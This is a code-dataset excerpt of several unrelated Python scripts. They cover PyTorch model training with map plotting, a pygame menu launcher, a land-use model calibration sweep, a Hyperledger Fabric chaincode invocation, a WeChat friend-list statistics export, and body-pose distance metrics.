file.\n\n Args:\n file_name -- (str) name of the file\n x -- (NumPy ndarray) epoch data [1..number_of_epochs]\n y -- (3d array/tuple) same as that of save_plot()\n title -- (str) first line of the file\n \"\"\"\n with open(file_name, \"wt\") as f:\n f.write(title + \"\\n\")\n f.write(\"J: %3d\\t\\tT: %3d\\n-------------\\n\" % (J, T))\n for i in range(0, len(x), args.log_interval):\n # write data at log_intervals\n f.write(\"epoch = %d\\t\\ttrainloss = %.4f, traintime = %.4f\" % (\n x[i], y[0][i][1], y[0][i][0]))\n if args.should_test:\n f.write(\"\\t\\ttestloss = %.4f, testtime = %.4f\" % (\n y[1][i][1], y[1][i][0]))\n f.write(\"\\n\")\n\ndef find_idx_of_nearest_el(array, value):\n \"\"\"\n Helper function to plot_predicted_map(). Returns the index of the element in\n array closest to value\n\n Args:\n array -- (NumPy ndarray) array to be searched in\n value -- (float) closest number in array found for this number\n\n Returns:\n int -- index of the closest number to value in array\n \"\"\"\n return (np.abs(array - value)).argmin()\n\ndef plot_predicted_map(file_name, lat_long, point_info, title, plot_offset=0.05):\n \"\"\"\n Plots the a scatter plot of point_info on the map specified by the latitudes\n and longitudes and saves the plot to a image file\n\n Args:\n file_name -- (str) file name of the plot\n lat_long -- (NumPy ndarray) 2-d matrix of latitudes and longitudes of \n locations. The first column contains latitudes, and the second \n column contains longitudes.\n point_info -- (NumPy ndarray) Z values for all locations. The order of \n locations must be same as the order in lat_long\n title -- (str) title of the plot\n plot_offset -- (float) padding value for latitude and longitude in the \n plot (default=0.05)\n \"\"\"\n # extract latitude and longitude\n lati = lat_long[:,0]\n longi = lat_long[:,1]\n # calculate plot dimensions - select between latitude/longitude based on \n # their span over earth. The greater span is the basis\n lo_min, lo_max = min(longi) - plot_offset, max(longi) + plot_offset\n la_min, la_max = min(lati) - plot_offset, max(lati) + plot_offset\n plot_width = max(lo_max - lo_min, la_max - la_min)\n lo_max = lo_min + plot_width\n la_max = la_min + plot_width\n\n # create the mesh for pcolormesh, see its documentation\n # retained step for convenience in testing\n # J+10 values needed on each side, this can lead to rectangular dots\n lo_range = np.linspace(lo_min, lo_max, num=J+10, retstep=True)\n la_range = np.linspace(la_min, la_max, num=J+10, retstep=True)\n lo, la = np.meshgrid(lo_range[0], la_range[0])\n\n z = np.zeros([J + 10, J + 10])\n for k in xrange(J):\n # for each location in latitude and longitude array, find the closest\n # value in the mesh, i.e., lati[k] in the mesh, longi[k] in the mesh\n lo_k_mesh = find_idx_of_nearest_el(lo[0], longi[k])\n la_k_mesh = find_idx_of_nearest_el(la[:, 0], lati[k])\n z[lo_k_mesh][la_k_mesh] = point_info[k] # assign Z value in the matrix\n\n map_fig = plt.figure(2)\n plt.pcolormesh(lo, la, z, cmap=plt.cm.get_cmap('Greys'), vmin=0.0, vmax=0.01)\n plt.axis([lo.min(), lo.max(), la.min(), la.max()])\n plt.colorbar()\n plt.title(title)\n map_fig.savefig(file_name, bbox_inches=\"tight\", dpi=200)\n if not args.hide_map_plot:\n plt.show()\n plt.close()\n\n# =============================================================================\n# misc utility functions\n# =============================================================================\ndef expand_R(rt, R_max=15):\n \"\"\"\n Expands rt into a matrix with each rt[u] having R_max number of elements,\n where the first rt[u] elements are 1's and rest 0's. So if rt[u] is 7 and \n R_max is 15, rt[u] becomes [1 1 1 1 1 1 1 0 0 0 0 0 0 0 0].\n\n Args:\n rt -- (Torch.Tensor) vector of rewards\n R_max -- (int) Number of elements for expansion (default=15). When using \n orig data, R_max must be greater than 15. It's also the max reward in \n the rewards file\n\n Returns:\n Torch.Tensor -- Expanded R of size J x R_max\n \"\"\"\n newrt = torchten(J, R_max)\n if args.cuda:\n newrt = newrt.cuda()\n for u in xrange(J):\n r = int(rt[u])\n newrt[u] = torch.cat([torch.ones(r), torch.zeros(R_max - r)], dim=0)\n return newrt\n\n# =============================================================================\n# main program\n# =============================================================================\nif __name__ == \"__main__\":\n # READY!!\n read_set_data()\n net = IdProb3()\n # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=args.momentum)\n optimizer = optim.Adam(net.parameters(), lr=args.lr)\n\n # SET!!\n transfer_time = time.time()\n if args.cuda:\n # transfer tensors to the gpu\n net.cuda()\n trainX, trainY, trainR = trainX.cuda(), trainY.cuda(), trainR.cuda()\n testX, testY, testR = testX.cuda(), testY.cuda(), testR.cuda()\n F_DIST = F_DIST.cuda()\n u_train, u_test = u_train.cuda(), u_test.cuda()\n file_pre_gpu = \"gpu, \"\n else:\n file_pre_gpu = \"cpu, \"\n transfer_time = time.time() - transfer_time\n if args.expand_R:\n file_pre_gpu = \"expandedR, \" + file_pre_gpu\n\n # scalar + tensor not supported in pytorch v0.12.2\n # formula = (u(Y-mean(Y)))^2\n train_loss_normalizer = (torch.mv(torch.t(trainY \\\n - torch.mean(trainY).expand_as(trainY)).data, u_train)).pow(2).sum()\n if args.should_test:\n test_loss_normalizer = (torch.mv(torch.t(testY \\\n - torch.mean(testY).expand_as(testY)).data, u_test)).pow(2).sum()\n \n # GO!!\n train_time_loss, test_time_loss, total_time = [], [], transfer_time\n for e in xrange(1, args.epochs + 1):\n # train\n train_res = train(net, optimizer, train_loss_normalizer, u_train)\n train_time_loss.append(train_res[0:2]) # the third element is not logged\n total_time += (train_res[0])\n\n # print results, some quirky arguments to print for nice console printing\n if e % 20 == 0:\n print(\"e= %2d, loss=%.8f\" % (e, train_res[1]), end=\"\")\n\n if args.should_test:\n # test\n test_res = test(net, test_loss_normalizer, u_test)\n test_time_loss.append(test_res[0:2])\n total_time += test_res[0]\n if e % 20 == 0:\n print(\", testloss=%.8f\\n\" % (test_res[1]), end=\"\")\n else:\n print(\"\\n\", end=\"\")\n\n if e == args.epochs:\n # Network's final prediction\n y_pred = test_res[2] if args.should_test else train_res[2]\n \n # FINISH!!\n # log and plot the results: epoch vs loss\n\n # define file names\n if args.rand:\n file_pre = \"randXYR_seed=%d, epochs=%d, \" % (args.seed, args.epochs)\n lat_long = ad.read_lat_long_from_Ffile(randF_file, J)\n else:\n file_pre = \"origXYR_seed=%d, epochs=%d, \" % (args.seed, args.epochs)\n lat_long = ad.read_lat_long_from_Ffile(\n \"./data/loc_feature_with_avicaching_combined.csv\", J)\n log_name = \"train=%3.0f%%, lr=%.3e, time=%.4f sec\" % (\n args.train_percent * 100, args.lr, total_time)\n epoch_data = np.arange(1, args.epochs + 1)\n fname = file_pre_gpu + file_pre + log_name\n # save amd plot data\n save_log(\n \"./stats/find_weights/logs/\" + fname + \".txt\", epoch_data, \n [train_time_loss, test_time_loss], log_name)\n with open(\"./stats/find_weights/weights/\" + fname + \".txt\", \"w\") as f:\n # save w1\n w1 = net.w1.data.cpu().numpy()\n f.write('# w1 shape: {0}\\n'.format(w1.shape))\n for data_slice in w1:\n f.write('# New slice\\n')\n np.savetxt(f, data_slice, fmt=\"%.15f\", delimiter=\" \")\n \n # save w2\n w2 = net.w2.data.view(-1, numFeatures).cpu().numpy()\n f.write('# w2 shape: {0}\\n'.format(w2.shape))\n np.savetxt(f, w2, fmt=\"%.15f\", delimiter=\" \")\n if not args.no_plots:\n # should plot\n save_plot(\n \"./stats/find_weights/plots/\" + fname + \".png\", epoch_data, \n [train_time_loss, test_time_loss], \"epoch\", \"loss\", log_name)\n plot_predicted_map(\n \"./stats/find_weights/map_plots/\" + fname + \".png\", \n lat_long, y_pred, log_name)\n \n print(\"---> \" + fname + \" DONE\")\n","sub_path":"nnAvicaching_find_weights.py","file_name":"nnAvicaching_find_weights.py","file_ext":"py","file_size_in_byte":28902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"521973872","text":"# JLM coursework\n# This will hopefully be the main file which launches the executable\n\n# Import statements ------\nimport pygame\nimport Toolbox\nimport Menus\n\n\npygame.init()\n# ------\n# Pygame Setup ------ THIS SHOULD ALL BE TURNED INTO ONE CLASS WITH THE SETTINGS LOAD, THIS WOULD THEN SUPERCLASS\n# ALL OF THE MENUS ETC EACH SHOULDN'T NEED A CONSTRUCTOR JUST A LOADER THEN RUNNER AND UNLOADER?\ngame = Toolbox.Game(\"Settings.txt\")\n\n# These create the objects for each screen\nmain_menu = Menus.MainMenu(30, game)\noptions_menu = Menus.OptionsMenu(30, game)\nplay_menu = Menus.PlayMenu(30, game)\nmap_creator_menu = Menus.MapMakerMenu(30, game)\n\n# This is being used to allow each object access to the menu objects, This could be changed for just accessing them\n# from the launcher\nmenus = [main_menu, options_menu, play_menu, map_creator_menu]\n\n# This adds the list of menus to the objects\nmain_menu.add_windows(menus)\noptions_menu.add_windows(menus)\nplay_menu.add_windows(menus)\nmap_creator_menu.add_windows(menus)\n\n# Loads each screen for the menu, this ensures they are always ready\nmain_menu.load_assets()\noptions_menu.load_assets()\nplay_menu.load_assets()\nmap_creator_menu.load_assets()\n\n\n# Starts the application by running main window\nmain_menu.run_window()\n","sub_path":"Launcher.py","file_name":"Launcher.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"559820814","text":"\"\"\"\nThis component of the Empirical Neighbourhood Calibration method conducts the\nenumeration analysis of the meta-parameters used to initialise the\ncalibration method.\n\"\"\"\n\nimport numpy as np\nfrom considered_distances import considered_distances\nfrom read_map import read_map\nfrom enrichment_factor import ef\nfrom log_scale_ef import log_scale_ef\nfrom contingency_table import contingency_table\nfrom set_NR import set_lp_rule\nfrom set_rand import set_rand\nfrom run_metro import run_metro\nfrom kappa import ksim\nfrom area_weighted_clu import area_weighted_clu_error\nimport csv\n\n# Specify the base path to the directory containing the empirical neighbourhood\n# calibration tool-pack.\nbase_path = \"C:\\\\Users\\\\charl\\\\OneDrive\\\\Documents\\\\ENC\\\\\"\n# Specify the case study.\ncase_study = \"Budapest\"\n# Set the paths to the directories and relevant data\ndata_path = base_path + \"Example_case_study_data\\\\\"\noutput_path = base_path + \"Example_case_study_output\\\\\"\nmap1_path = data_path + case_study + \"\\\\\" + case_study.lower() + \"_1990.asc\"\nmap2_path = data_path + case_study + \"\\\\\" + case_study.lower() + \"_2000.asc\"\nmask_path = data_path + case_study + \"\\\\\" + case_study.lower() + \"_mask.asc\"\n# Specify the working directory (location of project file) and project file.\nworking_directory = (\"C:\\\\Geonamica\\\\Metronamica\\\\\"\n + case_study + \"\\\\\")\nproject_file = working_directory + case_study + \".geoproj\"\n# Specify the paths to the simulated output maps.\nsmap_path = (\"C:\\\\Geonamica\\\\Metronamica\\\\\"\n + case_study + \"\\\\Log\\\\Land_use\\\\\"\n \"Land use map_2000-Jan-01 00_00_00.rst\")\n# Read in the data maps and mask.\nomap = read_map(map1_path)\namap = read_map(map2_path)\nmask = read_map(mask_path)\n# Analyse the input maps for evaluation purposes\nmap_dimensions = np.shape(omap)\nrows = map_dimensions[0]\ncols = map_dimensions[1]\n# Specify the command line version of Geonamica.\ngeo_cmd = \"C:\\\\Program Files (x86)\\\\Geonamica\\\\Metronamica\\\\GeonamicaCmd.exe\"\n# Specify the log file path.\nlog_file = base_path + \"LogSettings.xml\"\n\n# Set the land-use class names.\nluc_names = [\"Natural areas\", \"Arable land\", \"Permanent crops\", \"Pastures\",\n \"Agricultural areas\", \"Residential\", \"Industry & commerce\",\n \"Recreation areas\", \"Forest\", \"Road & rail\", \"Seaports\",\n \"Airports\", \"Mine & dump sites\", \"Fresh water\", \"Marine water\"]\n# Set the land-use class parameters: number of land-use classes, passive,\n# feature, and active.\nluc = len(luc_names)\npas = 1\nfea = 6\nact = luc - (pas + fea)\n\n# Count the presence of each land-use class in the actual map. This is\n# used in the calculation of area-weighted average clumpiness across the\n# active classes.\nluc_count = [0] * luc\nfor i in range(0, rows):\n for j in range(0, cols):\n if mask[i, j] > 0:\n luc_count[amap[i, j]] = luc_count[amap[i, j]] + 1\n# Specify the maximum neighbourhood size distance considered\nmax_distance = 5\n# Determine the distances that will be analysed, use module: considered_distances.\ntemp = considered_distances(max_distance)\n# Store the list of considered distances as a variable.\ncd = temp[0]\n# Store the total number of distances considered\ncdl = temp[1]\n# Determine the maximum neighbourhood size (unit) from considered distances\nN_all = [1, 8, 12, 16, 32, 28, 40, 40, 20]\nN = []\nfor c in range(0, max_distance):\n N.append(N_all[c])\n\n# Specify the meta-analysis calibration method parameters: the base random\n# seed, and the maximum number of simulation runs.\nmax_runs = 10\nbase_seed = 1000\n\n# Specify the bands levels.\n# The inertia band levels, for setting inertia values.\nhigh_inertia_band = 0.95\nmid_inertia_band = 0.90\n# The conversion band levels, for setting conversion values.\nhigh_conversion_band = 0.5\nmid_conversion_band = 0.1\nlow_conversion_band = 0.025\n# The enrichment factor band levels, for setting the tail values.\nhigh_ef = 1.0\nmid_ef = 0.5\n\n# Specify high, medium and low inertia values.\n# The default settings are a high inertia of 1000, med 500, low 250.\nhigh_inertia = 1000.0\nmid_inertia = 500.0\nlow_inertia = 250.0\n\n\"\"\"***Change the values here ***\"\"\"\n# Set default meta-parameters.\n# Self-influence tail, specified at a distance of 1\ntheta_si1 = 0.025\ntheta_si2 = theta_si1*0.1\n# Conversion point.\ntheta_cp = 0.045\n# Interaction tail, specified at a distance of 1\ntheta_ct1 = 0.005\ntheta_ct2 = theta_ct1*0.1\n\n# Calculate all relevant neighbourhood rule parameter values.\n# Set the conversion parameter values.\nhigh_conversion = high_inertia * theta_cp\nmid_conversion = mid_inertia * theta_cp\nlow_conversion = low_inertia * theta_cp\n# Set the distance 1 tail values for self-influence rules.\nd1_high_si_value = high_inertia * theta_si1\nd1_mid_si_value = mid_inertia * theta_si1\nd1_low_si_value = low_inertia * theta_si1\n# Set the distance 2 tail values for self-influence rules.\nd2_high_si_value = high_inertia * theta_si2\nd2_mid_si_value = mid_inertia * theta_si2\nd2_low_si_value = low_inertia * theta_si2\n# Set the distance 1 tail values for interaction rules.\nd1_high_co_value = high_inertia * theta_ct1\nd1_mid_co_value = mid_inertia * theta_ct1\nd1_low_co_value = low_inertia * theta_ct1\n# Set the distance 2 tail value for interaction rules.\nd2_high_co_value = high_inertia * theta_ct2\nd2_mid_co_value = mid_inertia * theta_ct2\nd2_low_co_value = low_inertia * theta_ct2\n\n# Generate the Enrichment Factor and contingency table.\ndata_ef = ef(luc, max_distance, cdl, cd, N, omap, amap, mask, rows, cols)\n# Log scale the enrichment factor values.\nlog_data_ef = log_scale_ef(data_ef, 10, luc, act, pas, max_distance)\n# Generate the contingency table using the module, 'contingency_table'\ncont_table = contingency_table(omap, amap, mask, luc, rows, cols)\n# Evaluate the rates of inertia and conversion\nic_rates = np.zeros(shape=(luc, luc))\nfor i in range(0, luc):\n for j in range(0, luc):\n if i == j:\n if cont_table[i, luc] > 0:\n ic_rates[i, j] = cont_table[i, j] / cont_table[i, luc]\n else:\n conversions = abs(float(cont_table[j, j]) - float(cont_table[luc, j]))\n if conversions > 0:\n ic_rates[i, j] = float(cont_table[i, j]) / float(conversions)\n# Load the attraction rules file\natt_rule_file = output_path + case_study + \"\\\\Rules\\\\att_rules.txt\"\natt_rules = np.loadtxt(att_rule_file)\n# Input the rules to be analysed. Start by initialising a dictionary for\n# storage.\nrules = {}\nfor i in range(0, act):\n for j in range(0, luc):\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n rules[key] = [0, 0, 0, 5]\n# Set the initial neighbourhood rule values for inertia and conversion.\nfor i in range(0, act):\n for j in range(0, luc):\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # If a self-influence rule, set the inertia value.\n if i + pas == j:\n if cont_table[i + pas, luc] > cont_table[luc, i + pas]:\n rules[key][0] = low_inertia\n else:\n inertia_rate = ic_rates[j, i + pas]\n if inertia_rate > high_inertia_band:\n rules[key][0] = high_inertia\n elif inertia_rate > mid_inertia_band:\n rules[key][0] = mid_inertia\n else:\n rules[key][0] = low_inertia\n # If an interactive rule, set the conversion rule.\n else:\n conversion_rate = ic_rates[j, i + pas]\n if conversion_rate > high_conversion_band:\n rules[key][0] = high_conversion\n elif conversion_rate > mid_conversion_band:\n rules[key][0] = mid_conversion\n elif conversion_rate > low_conversion_band:\n rules[key][0] = low_conversion\n# Set the initial neighbourhood rule values for attraction.\nfor i in range(0, act):\n for j in range(0, luc):\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # If a self-influence rule, set the self-influence attraction values.\n if i + pas == j:\n for c in range(1, 3):\n if c == 1:\n if att_rules[j, i] == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d1_high_si_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d1_mid_si_value\n else:\n rules[key][c] = d1_low_si_value\n elif c == 2:\n if att_rules[j, i] == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d2_high_si_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d2_mid_si_value\n else:\n rules[key][c] = d2_low_si_value\n # If a conversion rule, set the interactive attraction values.\n else:\n if (\n att_rules[j, i] == 1 and log_data_ef[1, j, i] > 0 and\n log_data_ef[2, j, i] > 0\n ):\n for c in range(1, 3):\n if c == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d1_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d1_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d1_low_co_value\n elif c == 2:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d2_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d2_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d2_low_co_value\n# Set the end-points of each attraction rule\nfor i in range(0, act):\n for j in range(0, luc):\n if att_rules[j, i] == 0:\n pass\n else:\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # Iterate through to find end point\n for c in range(2, 5):\n if att_rules[j, i] == 1 and log_data_ef[c, j, i] > 0:\n rules[key][3] = c + 1\n\n# Input the rules into the model.\nfor i in range(0, luc):\n for j in range(0, act):\n key = \"from \" + luc_names[i] + \" to \" + luc_names[j + pas]\n fu_elem = j\n lu_elem = i\n y0 = rules[key][0]\n y1 = rules[key][1]\n y2 = rules[key][2]\n xe = rules[key][3]\n set_lp_rule(project_file, fu_elem, lu_elem, y0, y1, y2, xe)\n\n# Enumerate possible ratio values.\n# First, initialise a dictionary to store metrics, this is done to account\n# for variable size.\nmetrics = {}\n\"\"\"***Change the bounds here ***\"\"\"\n# Start with the self-influence tail values. First, specify the range that will be tested.\nvaried_parameter = \"theta_ct\"\nlow_bound = 0\nhigh_bound = 1\ntheta_ct_step = 0.001\nfor a in range(low_bound, high_bound, 1):\n theta_ct1 = float(a)*theta_ct_step\n theta_ct2 = theta_ct1*0.1\n # Set the distance 1 tail values for interaction rules.\n d1_high_co_value = high_inertia * theta_ct1\n d1_mid_co_value = mid_inertia * theta_ct1\n d1_low_co_value = low_inertia * theta_ct1\n # Set the distance 2 tail value for interaction rules.\n d2_high_co_value = high_inertia * theta_ct2\n d2_mid_co_value = mid_inertia * theta_ct2\n d2_low_co_value = low_inertia * theta_ct2\n # Input the set values into the model.\n for i in range(0, act):\n for j in range(0, luc):\n # Specify the neighbourhood rule key.\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n # If a self-influence rule, skip.\n if i + pas == j:\n pass\n # If an interactive rule, set the conversion point value.\n else:\n if (\n att_rules[j, i] == 1 and log_data_ef[1, j, i] > 0 and\n log_data_ef[2, j, i] > 0\n ):\n for c in range(1, 3):\n if c == 1:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d1_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d1_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d1_low_co_value\n elif c == 2:\n if log_data_ef[c, j, i] > high_ef:\n rules[key][c] = d2_high_co_value\n elif log_data_ef[c, j, i] > mid_ef:\n rules[key][c] = d2_mid_co_value\n elif log_data_ef[c, j, i] > 0:\n rules[key][c] = d2_low_co_value\n # Input the rules to the specified project files.\n # This is only done for the conversion rules.\n for i in range(0, luc):\n for j in range(0, act):\n key = \"from \" + luc_names[i] + \" to \" + luc_names[j + pas]\n fu_elem = j\n lu_elem = i\n if i != j + pas:\n y0 = rules[key][0]\n y1 = rules[key][1]\n y2 = rules[key][2]\n xe = rules[key][3]\n set_lp_rule(project_file, fu_elem, lu_elem, y0, y1, y2, xe)\n # Generate the simulated output and track the results.\n run_count = 0\n ksim_log = [0]*max_runs\n clu_log = [0]*max_runs\n while run_count < max_runs:\n # Generate seed, run model to generate output.\n rseed = base_seed + run_count\n set_rand(project_file, rseed)\n run_metro(project_file, log_file, working_directory,\n geo_cmd)\n # Read in the map.\n smap = read_map(smap_path)\n # Calculate the corresponding metrics\n ksim_log[run_count] = ksim(omap, amap, smap, mask)\n clu_log[run_count] = area_weighted_clu_error(amap, smap, mask, luc, pas, act, luc_count)\n # Add one to iterator to avoid infinite loop!\n run_count = run_count + 1\n # Log metric properties corresponding to the output\n # First for Kappa Simulation\n key = \"ksim-\" + str(a)\n metrics[key] = [0]*3\n metrics[key][0] = sum(ksim_log)/len(ksim_log)\n metrics[key][1] = (max(ksim_log) - min(ksim_log))/2\n # Next for Absolute average clumpiness error.\n key = \"clu_error-\" + str(a)\n metrics[key] = [0] * 3\n metrics[key][0] = sum(clu_log) / len(clu_log)\n metrics[key][1] = (max(clu_log) - min(clu_log)) / 2\n# Organise and evaluate output.\n\n# Write the output to a .csv file.\nmetrics_output_file = output_path + case_study + \"\\\\theta_ct_meta_analysis_output.csv\"\nstore = [0]*5\nwith open (metrics_output_file, \"wb\") as csv_file:\n writer = csv.writer(csv_file)\n values = [\"theta_ct value\", \"KSIM avg.\", \"KSIM_err\", \"CLU avg\", \"CLU_err\"]\n writer.writerow(values)\n for a in range(low_bound, high_bound, 1):\n store[0] = float(a)*theta_ct_step\n store[1] = metrics[(\"ksim-\" + str(a))][0]\n store[2] = metrics[(\"ksim-\" + str(a))][1]\n store[3] = metrics[(\"clu_error-\" + str(a))][0]\n store[4] = metrics[(\"clu_error-\" + str(a))][1]\n writer.writerow(store)\n\n# Finished!","sub_path":"2c. Meta-analysis-conversion_tail.py","file_name":"2c. Meta-analysis-conversion_tail.py","file_ext":"py","file_size_in_byte":15623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"288027442","text":"import asyncio\nfrom hfc.fabric import Client\n\nloop = asyncio.get_event_loop()\n\ncli = Client(net_profile=\"/home/Adel/Desktop/PFE/Two_Chain_Network_Template/pfe-project/sdk/MyNetwork.json\")\norg1_admin = cli.get_user('org1.dz', 'Admin')\n\n\n\norg1_admin = cli.get_user(org_name='org1.dz', name='Admin')\n# Make the client know there is a channel in the network\ncli.new_channel('firstchannel')\n\n\n\n# Invoke the chaincode\nargs = ['10/07/2020 06:09:30', '[2kw, 4kw, 18kw, 21kw, 11kw, 10kw, 9kw, 13kw, 4kw, 15kw, 12kw, 8kw]', 'sd7f6s7f6s7f8as7fs7f8', '[66, 45, 78, 94, 77, 0, 0, 0, 0, 0, 44, 36]', 'asf7safs6f5s4df5sd4fas']\n\n# The response should be true if succeed\nresponse = loop.run_until_complete(\n cli.chaincode_invoke(\n requestor=org1_admin,\n channel_name='firstchannel',\n peers=['peer0.org1.dz', 'peer1.org1.dz', 'peer2.org1.dz', 'peer3.org1.dz'],\n args=args,\n fcn='NewData',\n cc_name='first_chaincode',\n transient_map=None, # optional, for private data\n wait_for_event=True, # for being sure chaincode invocation has been commited in the ledger, default is on tx event\n )\n )\n\nprint(response)\n","sub_path":"pfe-project/fabric-sdk-py/invoke.py","file_name":"invoke.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"144885374","text":"# -*-coding:utf-8 -*-\nimport itchat\nimport json\nimport traceback\nimport os\nfrom analysisData import analysisData\n\n\n\ndef checkLogin(func):\n def wrapper(*args, **kwargs):\n \"\"\"\n 装饰器:检查登录\n \"\"\"\n try:\n print('checkLogin.... ...')\n uuid = itchat.get_QRuuid()\n if itchat.check_login(uuid) != '200':\n # 扫码登录微信,并保存登录信息\n itchat.auto_login(hotReload=True)\n return func(*args, **kwargs)\n except:\n print(traceback.format_exc())\n\n return wrapper\n\nimport pandas as pd\nimport numpy as np\nimport json\nimport csv\n\ndef writeCSV(lines):\n with open('friendInfo.csv','w+',encoding='utf-8') as f:\n write=csv.writer(f)\n write.writerow(['remarkName','nickName','sex','province','city','signature'])\n for line in lines:\n write.writerow(line)\n\n# def writeJson(infoList):\n# \"\"\"\n# JSON数据写入文本文件\n# \"\"\"\n# os.remove('friendInfo.txt')\n# for info in infoList:\n# infoJsonStr = json.dumps(info, ensure_ascii=False)\n# with open('friendInfo.txt', 'a+', encoding='utf-8') as f:\n# f.writelines('{0}{1}'.format(infoJsonStr, '\\n'))\n\n\n# @checkLogin\n# def sendMsgToOne(userName):\n# \"\"\"\n# 给单个人发送消息\n# \"\"\"\n# userId = itchat.search_friends(name=userName)[0]['UserName'] # 根据Name查询用户id\n# itchat.send_msg('测试信息', toUserName=userId) # 发送消息\n\n\n@checkLogin\ndef statistic():\n \"\"\"\n 统计维信好友信息\n \"\"\"\n try:\n friendList = itchat.get_friends(update=True)[0:]\n friendInfoList = []\n for info in friendList:\n # friendInfo = {}\n remarkName = info['RemarkName']\n # friendInfo['remarkName'] = remarkName\n nickName = info['NickName']\n # friendInfo['nickName'] = nickName\n if info['Sex'] == 1:\n sex = '男'\n elif info['Sex'] == 2:\n sex = '女'\n else:\n sex = '其他'\n # friendInfo['sex'] = sex\n province = info['Province']\n # friendInfo['province'] = province\n city = info['City']\n # friendInfo['city'] = city\n signature = info['Signature']\n # friendInfo['signature'] = signature\n friendInfo = [remarkName,nickName,sex,province,city,signature]\n friendInfoList.append(friendInfo)\n # break\n # print('friendInfoList=',friendInfoList)\n return friendInfoList\n except:\n print(traceback.format_exc())\n\n\nif __name__ == '__main__':\n \"\"\"\n 主函数\n \"\"\"\n try:\n # 扫码登录微信,并保存登录信息\n itchat.auto_login(hotReload=True)\n # sendMsgToOne()\n infoList = statistic()\n # writeJson(infoList)\n writeCSV(infoList)\n # print(infoList)\n analysisData()\n except:\n print(traceback.format_exc())\n","sub_path":"wechat/wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648465794","text":"# Класс метрики пространственных изменинй туловища\n# \n# Максимальное расхождение рук и туловища (для верности взять квантиль 80?) +\n# Максимальное расхождение рук между собой +\n# Высота от носка до пальцев (объективная высота рук) +\n# Расстояние от коленного сустава до плеча (объктивная искаженная высота подъема колена при ходьбе) +\n# Искаженный рост (от пяток через колени, таз, плечи, до головы) +\n# Расстояние между плечами +\n# Ширина таза + \n\nfrom scipy.spatial.distance import euclidean\nimport numpy as np\n\nfrom loguru import logger\nfrom services import (\n extractSeries,\n countMinMaxMean\n)\nclass Body():\n def __init__(self, df) -> None:\n self.series = extractSeries(df)\n\n self.minHeight, self.maxHeight, self.meanHeight = countMinMaxMean(self.getHeight())\n self.minFeetWristHeight, self.maxFeetWristHeight, self.meanFeetWristHeight = countMinMaxMean(self.getFeetWristHeight())\n self.minArmsDispersion, self.maxArmsDispersion, self.meanArmsDispersion = countMinMaxMean(self.getArmsDispersion())\n self.minArmsBodyDispersion, self.maxArmsBodyDispersion, self.meanArmsBodyDispersion = countMinMaxMean(self.getBodyArmsDispersion())\n self.minHipsDiffer, self.maxHispDiffer, self.meanHipsDiffer = countMinMaxMean(self.getHipsDiffers())\n\n self.shoulderWidth = self.getMeanShouldersWidth()\n self.hipsWidth = self.getMeanHipsWidth()\n \n def getHipsDiffers(self):\n for seria in self.series:\n subSeria = seria[[\n 'Таз слева',\n \"Таз справа\"\n ]]\n differ = pow(subSeria[0][1] - subSeria[1][1], 2)\n \n yield differ\n\n def getHeight(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левая лодыжка',\n \"Правая лодыжка\",\n \"Нос\"\n ]]\n\n left_height = euclidean(subSeria[0], subSeria[2])\n right_height = euclidean(subSeria[1], subSeria[2])\n height = (left_height + right_height) / 2\n\n yield height\n\n def getArmsDispersion(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левая кисть',\n \"Правая кисть\"\n ]]\n\n hands = euclidean(subSeria[0], subSeria[1])\n\n yield hands\n \n def getBodyArmsDispersion(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левая кисть',\n 'Левое плечо',\n \"Правая кисть\",\n 'Правое плечо'\n ]]\n\n left = euclidean(subSeria[0], subSeria[1])\n right = euclidean(subSeria[2], subSeria[3])\n\n yield left + right\n\n def getFeetWristHeight(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левый носок',\n 'Левая кисть',\n \"Правый носок\",\n 'Правая кисть'\n ]]\n\n left = euclidean(subSeria[0], subSeria[1])\n right = euclidean(subSeria[2], subSeria[3])\n\n yield (left + right) / 2\n\n def getKneeHeight(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левое колено',\n 'Левое плечо',\n \"Правое колено\",\n 'Правое плечо'\n ]]\n\n left = euclidean(subSeria[0], subSeria[1])\n right = euclidean(subSeria[2], subSeria[3])\n\n yield (left + right) / 2\n\n def getShoulderWidth(self):\n for seria in self.series:\n subSeria = seria[[\n 'Левое плечо',\n 'Правое плечо'\n ]]\n width = euclidean(subSeria[0], subSeria[1])\n yield width\n\n def getMeanShouldersWidth(self):\n widths = 